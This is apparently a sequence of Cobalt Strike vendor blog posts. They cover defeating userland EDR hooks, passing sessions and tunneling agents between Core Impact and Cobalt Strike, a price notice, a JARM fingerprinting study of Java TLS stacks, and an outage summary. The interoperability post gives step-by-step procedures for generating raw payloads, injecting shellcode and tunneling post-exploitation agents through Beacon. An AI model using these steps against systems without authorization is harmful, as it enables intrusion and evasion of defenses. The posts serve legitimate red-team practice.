Like direct system calls, I see the use of process mitigations as an evasion that is also potentially its own tell. Be aware of this tradeoff. Also, like direct system calls, this is an option that has use both during post-exploitation and in an initial access artifact. Any initial access artifact that performs migration (again, Cobalt Strike’s service executables do this) could benefit from this approach in some security stacks too.

Closing Thoughts

And, there you have it. This blog post presented a few different techniques to defeat userland hooks with Cobalt Strike. Better still, each of these techniques delivers benefit at a different place in Cobalt Strike’s engagement cycle.

Be aware that each of these methods is beneficial in very specific circumstances. None of the above will have impact against technologies that do not use userland hooks for instrumentation. Offense is always about trade-offs. Knowing the techniques available to you and knowing their trade-offs will help you assess your situation and decide the best way forward. This is key to good security testing engagements.

Agent Deployed: Core Impact and Cobalt Strike Interoperability

Core Impact 20.3 shipped this week. With this release, we’re revealing patterns for interoperability between Core Impact and Cobalt Strike. In this post, I’ll walk you through these patterns and provide advice on how to benefit from using Cobalt Strike and Core Impact together.

A Red Team Operator’s Introduction to Core Impact

Prior to jumping into the patterns, I’d like to introduce you to Core Impact with my voice. Core Impact is a commercial penetration testing tool and exploit framework that has had continuous development since 1998.

Impact is a collection of remote, local, and client-side attacks for public vulnerabilities and other common offense actions. We implement [with special attention to QA] our own exploits as well. While we announce 2-3 product updates per year, we push new modules and module updates in between releases too.

Impact is also a collection of post-exploitation agents for Windows, Linux, other *NIX flavors (to include OS X), and Cisco IOS. While Windows has the most features and best support, our *NIX agents are robust and useful. The pivoting model and interface for these platforms is largely unified. The Impact agent is one of my favorite parts of the product.

Core Impact also has a graphical user interface to bring all of these things together. It’s quirky and does have a learning curve. But once you grok the ideas behind it, the product clicks and you can see that it is well thought out.

While Core Impact was long-marketed as a vulnerability verification tool [notice: I’m not mentioning the automation], it’s clear to me that the product was architected by hackers. This hacker side of Core Impact is what I’d like to show you in this video walk-through:

Session Passing from Core Impact to Cobalt Strike

One of the most important forms of tool interoperability is the ability to pass sessions between platforms.

Core Impact 20.3 includes a Run shellcode in temporary process module to support session passing. This module spawns a temporary process and injects the contents of the specified file into it. The module does support spawning code x86 -> x86, x64 -> x64, and x64 -> x86.

To pass a session from Core Impact to Cobalt Strike:

[Cobalt Strike]

1. Go to Attacks -> Packages -> Windows EXE (S)
2. Press … to choose your listener
3. Change Output to raw
4. Check x64 if you wish to export an x64 payload.
5. Press Generate and save the file

[Core Impact]

1. Right-click on the desired agent and click Set as Source
2. Find the Run shellcode in temporary process module and double-click it.
3. Set ARCHITECTURE to x86-64 if you exported an x64 payload
4. Set FILENAME to the file generated by Cobalt Strike
5. Press OK

This pattern is a great way to spawn Cobalt Strike’s Beacon after a successful remote or privilege escalation exploit with Core Impact.

Session Passing from Cobalt Strike to Core Impact

You can also spawn a Core Impact agent from Cobalt Strike. If Core Impact and Cobalt Strike can reach the same network, this pattern is a lightweight way to turn an access obtained with Beacon (e.g., via phishing, lateral movement, etc.) into an Impact agent.

[Core Impact]

1. Find the Package and Register Agent module and double-click it.
2. Change ARCHITECTURE to x86-64 if you’d like to export an x64 agent
3. Change BINARY TYPE to raw
4. Change TARGET FILE to where you would like to save the file
5. Expand Agent Connection
6. Change CONNECTION METHOD and PORT to fit your preference. I find the Connect from target (reverse TCP connection) is the most performant.

[Cobalt Strike]

1. Interact with a Beacon
2. Type shspawn x64 if you exported an x64 agent. Type shspawn x86 if you exported an x86 agent.
3. Find the file that you exported.
4. Press Open.

In a few moments, you should hear that famous New Agent Deployed wav.

Tunnel Core Impact exploits through Cobalt Strike

Core Impact has an interesting offensive model. Its exploits and scans do not originate from your Core Impact GUI. The entire framework is architected to delegate offense activity through a source agent. The currently selected source agent also acts as a controller to receive connections from reverse agents [or to connect to and establish control of bind agents]. In this model, the offense process is: start with local agent, find and exploit target, set new agent as source agent, find and exploit newly visible targets, repeat until satisfied.

As the agent is the main offense actor in Core Impact, tunneling Core Impact exploits is best accomplished by tunneling the Core Impact agent through Cobalt Strike’s Beacon.

Cobalt Strike 4.2 introduced the spunnel command to spawn Core Impact’s Windows agent in a temporary process and create a localhost-only reverse port forward for it. Here are the steps to tunnel Core Impact’s agent with spunnel:

[Core Impact]

1. Click the Modules tab in the Core Impact user interface
2. Search for Package and Register Agent
3. Double-click this module
4. Change Platform to Windows
5. Change Architecture to x86-64
6. Change Binary Type to raw
7. Click Target File and press … to decide where to save the output.
8. Go to Agent Connection
9. Change Connection Method to Connect from Target
10. Change Connect Back Hostname to 127.0.0.1
11. Change Port to some value (e.g., 9000) and remember it.
12. Press OK.

[Cobalt Strike]

1. Interact with a Beacon
2. Type spunnel x64 [impact IP address] 9000 and press enter.
3. Find the file that you exported.
4. Press Open.

This is similar to passing a session from Cobalt Strike to Core Impact. The difference here is that the Impact agent’s traffic is tunneled through Cobalt Strike’s Beacon payload.

What happens when Cobalt Strike’s team server is on the internet and Core Impact is on a local Windows virtual machine? We have a pattern for this too. Run a Cobalt Strike client from the same Windows system that Core Impact is installed onto. Connect this Cobalt Strike client to your team server. In this setup, run spunnel_local x64 127.0.0.1 9000 to spawn and tunnel the Impact agent through Beacon. The spunnel_local command is like spunnel, with the difference that it routes the agent traffic from Beacon to the team server and onwards through your Cobalt Strike client. The spunnel_local command was designed for this exact situation.

Next step: Request a trial

The above options are our patterns for interoperability between Core Impact and Cobalt Strike.

If you have Cobalt Strike and would like to try these patterns with Core Impact, we recommend that you request a trial of Core Impact and try it out.

2021 Cobalt Strike Renewal COLA Price Increase

At HelpSystems we are committed to investing in continuous improvement by enhancing existing solutions, developing new technologies, and retaining the best employees. Maintenance and subscription fees for your HelpSystems software licenses provide access to regular software updates, our world-class technical support, and other entitlements as applicable. In order to maintain the highest standards, an annual maintenance and subscription increase is in place. Annual increases are primarily the result of inflationary pressures associated with rises in employee costs and other external factors. These anticipated annual increases make it easier for customers to budget for their annual maintenance and subscription. Price increases will be assessed on an annual basis.

On January 1, 2021 we will raise the price of Cobalt Strike renewals by 3.4%. This renewal price increase applies to quotes issued on and after January 1, 2021. For example: A $2,500 one user/one year standard license renewal will cost $2,585 (+ tax) in 2021.

A Red Teamer Plays with JARM

I spent a little time looking into Salesforce’s JARM tool, released in November. JARM is an active tool that probes the TLS/SSL stack of a listening internet application and generates a hash that’s unique to that specific TLS/SSL stack.

One of the initial JARM fingerprints of interest relates to Cobalt Strike. The value associated with Cobalt Strike is:

07d14d16d21d21d07c42d41d00041d24a458a375eef0c576d23a7bab9a9fb1

To generate a JARM fingerprint for an application, use the JARM python tool:

python3 jarm.py [target] -p [port]
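For example, to fingerprint a batch of candidate servers (a sketch that assumes a candidates.txt file with one host per line):

while read -r host; do
    printf '%s ' "$host"
    python3 jarm.py "$host" -p 443
done < candidates.txt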

I opted to dig into this, because I wanted to get a sense of whether the fingerprint is Cobalt Strike or Java.

Cobalt Strike’s JARM Fingerprint is Java’s JARM Fingerprint

I started my work with a hypothesis: Cobalt Strike’s JARM fingerprint is Java’s JARM fingerprint. To validate this, I created a simple Java SSL server application (listens on port 1234) in Sleep.

import javax.net.*;
import javax.net.ssl.*;

$factory = [SSLServerSocketFactory getDefault];
$server  = [$factory createServerSocket: 1234];
[$server setSoTimeout: 0];

if (checkError($error)) {
	warn($error);
}

while (true) {
	$socket = [$server accept];	
	[$socket startHandshake];
	[$socket close];
}

I ran this server from Java 11 with:

java -jar sleep.jar server.sl

I assessed its JARM fingerprint as:

00000000000000000042d41d00041d7a6ef1dc1a653e7ae663e0a2214cc4d9

Interesting! This fingerprint does not match the supposed Cobalt Strike fingerprint. Does this mean we’re done? No.

The current popular use of JARM is to fingerprint web server applications listening on port 443. This implies that these servers have a certificate associated with their TLS communications. Does this change the above JARM fingerprint? Let’s setup an experiment to find out.

I generated a Java keystore with a self-signed certificate and I directed my simple server to use it:

keytool -keystore ./exp.store -storepass 123456 -keypass 123456 -genkey -keyalg RSA -dname "CN=,OU=,O=,L=,S=,C="
java -Djavax.net.ssl.keyStore=./exp.store -Djavax.net.ssl.keyStorePassword=123456 -jar sleep.jar server.sl

The JARM result:

07d14d16d21d21d07c42d41d00041d24a458a375eef0c576d23a7bab9a9fb1

Interesting. We’ve validated that the above JARM fingerprint is specific to a Java 11 TLS stack.

Another question: is the JARM fingerprint affected by Java version? I setup several experiments and validated that yes, different major Java versions have different JARM fingerprints in the above circumstance.

How many Java-native Web servers are on the internet?

Part of the value of JARM is to turn the internet haystack into something smaller for an analyst to sift through. I wanted to get a sense of how much Java is on the internet. Fortunately, this analysis was easy thanks to some timely and available data. Silas Cutler had scanned the internet for port 443 and obtained JARM values for each of these hosts. This data was made available as an SQLite database too. Counting through this data was a relatively easy exercise of:

sqlite> .open jarm.sqlite
sqlite> select COUNT(ip) FROM jarm WHERE hash = "[hash here]";

Here’s what I found digging through this data:

Application   Count    JARM Hash
Java 1.8.0    21,099   07d14d16d21d21d07c07d14d07d21d9b2f5869a6985368a9dec764186a9175
Java 1.9.0    9        05d14d16d04d04d05c05d14d05d04d4606ef7946105f20b303b9a05200e829
Java 11.05    2,957    07d14d16d21d21d07c42d41d00041d24a458a375eef0c576d23a7bab9a9fb1
Java 13.01    0        2ad2ad16d2ad2ad22c42d42d00042d58c7162162b6a603d3d90a2b76865b53

I went a slight step further with this data. I opted to convert the Java 11.05 data to hostnames and eyeball what looked interesting. I found several mail servers, though I did not investigate which applications they are. I found an instance of Burp Intruder (corroborating Salesforce’s blog post), as well as several instances of Oracle Peoplesoft. These JARM hashes are a fingerprint for Java applications in general.
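For anyone who wants to repeat that step, the conversion can be done with a simple reverse-lookup loop (a sketch; it assumes the matching IP addresses were exported from the SQLite query to a file, one per line):

# resolve each IP back to a hostname for eyeballing
while read -r ip; do
    printf '%s %s\n' "$ip" "$(dig +short -x "$ip")"
done < java11-ips.txt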

Closing Thoughts

For defenders, I wouldn’t act on a JARM value as proof of application identity alone. For red teamers, this is a good reminder to think about pro-active identification of command and control servers. This is a commoditized threat intelligence practice. If your blue team uses this type of information, there are a lot of options to protect your infrastructure. Part 3 of Red Team Operations with Cobalt Strike covers this topic starting at 1h 26m 15s:

JARM is a pretty cool way to probe a server and learn more about what it’s running. I’d love to see a database of JARM hashes and which applications they map to as a reconnaissance tool. The C2 fingerprinting is a neat application of JARM too. It’s a good reminder to keep up on your infrastructure OPSEC.

verify.cobaltstrike.com outage summary

Cobalt Strike’s update process was degraded due to a data center outage that affected https://verify.cobaltstrike.com. The verify server is back up and the functionality of our update process is restored.

Here’s the timeline of the incident:

November 10, 2020 – 5:15pm EST The Cobalt Strike update process is degraded. You may still download and update the product. The verification step is unavailable. You will see a warning about verify.cobaltstrike.com not accepting connections during the update process. There is a data center networking issue that impacted our verification server. We are working with our service provider and monitoring the issue.

November 10, 2020 – 9:35pm EST The data center network issue was a planned power outage gone awry. We will bring the verify server online once connectivity is restored.

November 11, 2020 12:20pm EST The power outage caused a hardware failure with our provider. Our provider is working to address this. We have the option to migrate verify elsewhere, but are waiting out the restoration of the current server at this time.

November 11, 2020 1:05pm EST The verify server is back online and this incident is resolved.

What is the verify server?

The verify server is where we publish SHA-256 hashes of the Cobalt Strike product and its distribution packages. Our update program pins the certificate of this server and uses its hashes to verify the integrity of the product download. When the update program is unable to complete this process, it gives you the option to continue, but it warns that you should not.
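The update program performs this check for you, but the same verification can be done by hand with standard tools (a sketch; the filename and hash below are placeholders):

# compare a downloaded package against the hash published on the verify server
echo "<published-sha256-hash>  cobaltstrike-dist.tgz" | sha256sum -c -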

The verify server exists on infrastructure separate from other parts of the Cobalt Strike update process. This outage did not affect other parts of our update infrastructure.